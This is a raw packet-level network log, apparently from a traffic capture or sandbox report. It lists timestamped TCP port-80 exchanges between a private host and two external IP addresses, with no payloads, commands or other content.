Jan 8, 2025 11:08:59.817744017 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817754984 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817780972 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.817800045 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.818718910 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.818738937 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.818748951 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.818762064 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.818772078 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.818783045 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.818788052 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.818814993 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.819644928 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.819655895 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.819667101 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.819700003 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.819725037 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.820127964 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.820139885 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.820152044 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.820171118 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.820182085 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.820183992 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.820194960 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.820211887 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.820241928 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.821167946 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821180105 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821229935 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.821444988 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821460009 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821466923 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821502924 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.821502924 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821515083 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821526051 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.821536064 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.821563959 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.822424889 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.822436094 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.822453976 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.822479963 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.822504044 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.822853088 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.822913885 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.823072910 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.823082924 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.823092937 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.823122978 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.823146105 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.823148012 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.823162079 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.823173046 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.823195934 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.823225021 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.824053049 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.824064016 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.824073076 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.824104071 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.824114084 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.824116945 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.824126959 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.824132919 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.824151039 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.824177027 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825038910 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825062037 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825073004 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825092077 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825092077 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825107098 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825109005 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825134039 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825174093 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825175047 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825191975 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825205088 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825215101 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825216055 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825226068 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825234890 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825244904 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825256109 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825263023 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825267076 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825277090 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825303078 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.825984955 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.825999022 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826010942 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826054096 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.826060057 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826067924 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.826071978 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826083899 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826091051 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.826096058 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826108932 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.826143026 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.826165915 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826175928 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826185942 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826196909 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826206923 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826209068 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.826217890 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826224089 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.826226950 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.826271057 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.827282906 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827296019 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827306986 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827338934 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827343941 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.827349901 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827362061 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.827363968 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827377081 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827387094 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.827409983 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.827446938 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827456951 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827466965 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827478886 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827490091 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.827491045 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.827512026 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.827527046 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.874993086 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875009060 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875026941 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875040054 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875051022 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875063896 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875071049 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875077009 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875121117 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875124931 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875138998 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875154018 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875166893 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875185966 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875196934 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875210047 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875221968 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875222921 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875246048 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875262976 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875271082 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875287056 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875322104 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875405073 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875416994 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875436068 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875446081 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875467062 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875479937 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.875502110 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.875539064 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:04.538160086 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:04.538228035 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:07.163846016 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.396065950 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.401274920 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.401349068 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.401454926 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.406219959 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874324083 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874382019 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874409914 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874425888 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874442101 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874460936 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874478102 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874494076 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874511957 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874528885 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.874579906 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.874711037 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.879501104 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.879517078 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.879534006 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.879547119 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.879582882 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.879647970 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.961086988 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961124897 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961141109 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961158037 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961168051 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.961199999 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.961373091 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961400986 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961420059 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961436987 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961441040 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.961477995 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.961910963 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961929083 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961957932 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961966991 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.961975098 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.961993933 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.962012053 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.962702036 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.962718964 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.962735891 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.962753057 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.962769985 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.962785006 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.962785006 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.962806940 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.962827921 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.963639021 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.963704109 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.963720083 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.963725090 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.963738918 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.963756084 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:23.963758945 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:23.963793039 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:24.002454042 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.002471924 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.002537012 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:24.047982931 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.048031092 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.048043013 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.048053980 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.048065901 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.048079967 CET	80	49743	192.3.27.144	192.168.2.4
Jan 8, 2025 11:09:24.048136950 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:24.048176050 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:24.094692945 CET	49743	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:09:48.879184961 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:48.884134054 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:48.884219885 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:48.884488106 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:48.884529114 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:48.889681101 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:48.889692068 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834240913 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834275007 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834285975 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834301949 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834322929 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834350109 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.834367037 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834378004 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834384918 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.834389925 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834414959 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.834424019 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.834484100 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834549904 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.834589958 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.839231014 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.839245081 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.839268923 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.839298964 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.946583033 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.955872059 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.955889940 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.955950975 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.965394974 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.965424061 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.965478897 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.965491056 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.965503931 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.965513945 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.965529919 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.965559006 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.965572119 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.965595961 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.966413975 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.966434002 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.966447115 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.966454983 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.966459990 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.966474056 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.966483116 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.966532946 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.967242002 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967255116 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967267036 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967295885 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.967581034 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967602968 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967613935 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967644930 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.967663050 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967677116 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:49.967720032 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:49.968456984 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.006737947 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.006757021 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.006777048 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.006787062 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.006794930 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.006819010 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.085303068 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.085335016 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.085345984 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.085366011 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.085381985 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.092953920 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.092978954 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093128920 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093138933 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093152046 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093179941 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.093355894 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093368053 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093378067 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093406916 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.093420029 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.093696117 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093708038 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093719959 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093755007 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.093940020 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093950033 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.093987942 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.094104052 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094122887 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094141960 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.094217062 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094228983 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094240904 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094263077 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.094284058 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.094491005 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094508886 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094547987 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.094742060 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094753981 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094765902 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094796896 CET	49744	80	192.168.2.4	46.173.214.14
Jan 8, 2025 11:09:50.094954967 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094996929 CET	80	49744	46.173.214.14	192.168.2.4
Jan 8, 2025 11:09:50.094996929 CET	49744	80	192.168.2.4	46.173.214.14
